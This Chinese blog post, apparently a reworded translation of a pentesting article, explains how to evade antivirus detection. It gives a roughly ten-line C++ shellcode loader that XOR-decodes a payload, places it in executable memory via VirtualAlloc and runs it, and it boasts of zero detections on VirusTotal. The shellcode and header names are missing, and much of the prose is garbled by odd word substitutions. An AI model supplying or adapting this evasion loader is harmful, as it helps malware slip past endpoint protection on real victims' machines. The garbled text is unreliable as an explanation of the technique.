如何利用十行代码，绕过杀毒软件实现免杀？

　　我本来准备写篇冗杂的搏客叙述对于不一样电脑杀毒软件的绕开技术性，但当你刚开始下手写实例教程的第一关并发送样版到?virustotal?后，我吃惊了！样版获得了?0/56?的检验率。因此我先丢掉此前的废话连篇，继而纪录这一迅速、让人难以想象的简易方式 。

　　相信绝大多数的用户都是愿意这一见解，绕开绝大多数电脑杀毒软件的基础方式 都很平时没有什么独特的。殊不知，因为我有时候会碰到某些人只是借助专用工具转化成二进制文件，这种文档非常容易被电脑杀毒软件根据指纹识别标识出去。文中关键是为这种人所提前准备的。

　　在人们刚开始触碰这些精巧的?C++?编码前，我想要先详细介绍1个能够十分棒的生产制造免杀的专用工具?Veil-Evasion?(Veil-Framework?的部分)。这一专用工具十分奇妙?(谢谢?@harmj0y?和他的朋友们建立了这一奇妙的新项目)，在基本上全部状况下，它也没有要我心寒过。假如有，那么我还要指责这些一直不断转化成二进制文件随后上传入?virustotal?开展检测的人。假如我不那么做，你就会更为幸福了。

　　不管怎样，这就找出了1个难题，即然像?Veil-Evasion?这种的专用工具那么奇妙，那为何你可以关注怎样自身在二进制文件添加?shellcode？缘故有许多：

　　大神都比较忙并且专用工具一些落伍。

　　专用工具转化成的二进制都有着类似的指纹识别，并不是指?payload，只是说专用工具编译二进制的构造有类似的指纹识别。

　　做为1个渗透测试工作人员，你理应了解怎样做。

　　在你看看下边的编码前，你应当留意到它是对于?Windows?服务平台的，很显著编码中有?的引证。

　　#include?<>

　　#include?

　　int?main?(int?argc,?char?**argv)?{

　　char?b[]?=?{};

　　char?c[sizeof?b];

　　for?(int?i?=?0;?i?<?sizeof?b;?i++)?{c[i]?=?b[i]?^?'x';}

　　void?*exec?=?VirtualAlloc?(0,?sizeof?c,?MEM_COMMIT,?PAGE_EXECUTE_READWRITE);

　　memcpy?(exec,?c,?sizeof?c);

　　((void(*)())?exec)();

　　}

　　非常简单，上边的编码建立了1个能够自行添加包括?shellcode?的字符数组，关键环节取决于将你的?shellcode?与小写字母?‘x’?实行异或实际操作，随后分派某些运行内存，复制字符数组到分派的运行内存中，最终实行它。必须需注意的是，你可以先将?shellcode?与你挑选的关键词(本例中为?‘x’)开展异或实际操作，随后将?shellcode?放进到上边编码中并编译。

　　这时候你将会会问“慢慢？”。我掌握你的体会，由于那时候我是那么想的，在写完第一关內容并发送样版到?virustotal?后并接到?0/56?的检验率。我想要注重它是1个让人难以想象的简易和基本的技术性，但它通过率却刺激的高。